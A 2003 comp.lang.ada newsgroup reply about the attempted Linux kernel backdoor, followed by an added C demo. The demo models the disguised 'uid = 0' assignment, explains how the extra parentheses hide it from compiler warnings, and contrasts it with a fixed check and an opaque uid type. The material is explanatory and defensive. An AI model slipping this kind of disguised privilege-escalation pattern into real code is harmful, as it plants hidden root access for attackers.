From: Duncan Sands
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:50:16 +0100
Organization: Cuivre, Argent, Or
References: <3FB1A63C.9080200@nowhere.com>
To: v.hoefler@acm.org, Vinzent 'Gadget' Hoefler, comp.lang.ada@ada-france.org
User-Agent: KMail/1.5.1

> The interesting line in question is this one:
> |if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>
> First this looks like a sanity check. But look closer. This single
> line serves one single purpose: to give you root privileges when you
> just pass the right flags. Note the "current->uid = 0" instead of
> "current->uid == 0". Who the hell had the fucking bad idea that
> assignments could return values?

IMHO the real problem is that uid is not an opaque type and can be changed with a simple assignment. Much better if that required a function call.

All the best,

Duncan.
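Added example, not part of the original thread and not code from the Linux tree: a user-space model of the quoted wait4() line, run once as written and once with the comparison it was pretending to be, plus the opaque-type fix Duncan suggests. The task structures, function names and uid values are constructed for the demo; only the __WCLONE and __WALL flag values mirror the Linux uapi headers.

```c
/*
 * Model of the quoted wait4() check.  struct task, struct ktask and all
 * function names are constructed for this example; they are not the
 * kernel's own definitions.  The flag values are the kernel's.
 */
#include <stdio.h>

#define __WCLONE 0x80000000u
#define __WALL   0x40000000u
#define EINVAL   22

typedef unsigned int uid_t;

/* Stand-in for the uid field of task_struct. */
struct task {
    uid_t uid;
};

/*
 * The quoted line.  "(current->uid = 0)" is an assignment: it stores 0
 * into the caller's uid and then evaluates to 0, so the && is always
 * false and the error path is dead code.  The extra parentheses around
 * the assignment are exactly what silence GCC's -Wparentheses
 * "suggest parentheses around assignment used as truth value" warning.
 */
long wait4_check_backdoored(struct task *current, unsigned int options)
{
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        return -EINVAL;
    return 0;
}

/* What the line looked like it was doing: reject root with both flags. */
long wait4_check_fixed(struct task *current, unsigned int options)
{
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        return -EINVAL;
    return 0;
}

/*
 * Duncan's remedy: make uid opaque so a bare assignment cannot touch it.
 * In C a one-field struct is enough: "current->kuid = 0" no longer
 * compiles (int assigned to a struct), so the only way to change the
 * uid is through a named setter that a reviewer can grep for.
 */
typedef struct { unsigned int val; } kuid_t;

struct ktask {
    kuid_t kuid;
};

static inline int uid_is_root(kuid_t u) { return u.val == 0; }

static inline void task_set_uid(struct ktask *t, unsigned int newuid)
{
    t->kuid.val = newuid;
}

long wait4_check_opaque(struct ktask *current, unsigned int options)
{
    /* (current->kuid = 0) here would be a compile-time type error. */
    if ((options == (__WCLONE|__WALL)) && uid_is_root(current->kuid))
        return -EINVAL;
    return 0;
}

/* Returns 1 if an unprivileged caller ends up with uid 0 after the
 * backdoored check accepted its flags, 0 otherwise. */
int demo_escalation(void)
{
    struct task t = { .uid = 1000 };
    long rc = wait4_check_backdoored(&t, __WCLONE|__WALL);
    return rc == 0 && t.uid == 0;
}

int main(void)
{
    struct task t = { .uid = 1000 };
    struct ktask k = { .kuid = { 1000 } };

    printf("backdoored check: rc=%ld, uid afterwards=%u\n",
           wait4_check_backdoored(&t, __WCLONE|__WALL), t.uid);
    t.uid = 1000;
    printf("fixed check:      rc=%ld, uid afterwards=%u\n",
           wait4_check_fixed(&t, __WCLONE|__WALL), t.uid);
    printf("opaque check:     rc=%ld, uid afterwards=%u\n",
           wait4_check_opaque(&k, __WCLONE|__WALL), k.kuid.val);
    task_set_uid(&k, 0);
    printf("opaque, as root:  rc=%ld\n",
           wait4_check_opaque(&k, __WCLONE|__WALL));
    return 0;
}
```

The point the demo makes concrete is that the backdoored line never returns an error for anyone: the condition is false by construction, and its only observable effect is the side effect on `uid`. Compiler warnings are no defence once the author adds the parentheses deliberately, which is why a type that refuses plain assignment is the more robust check; the mainline kernel later adopted exactly this kind of `kuid_t` wrapper.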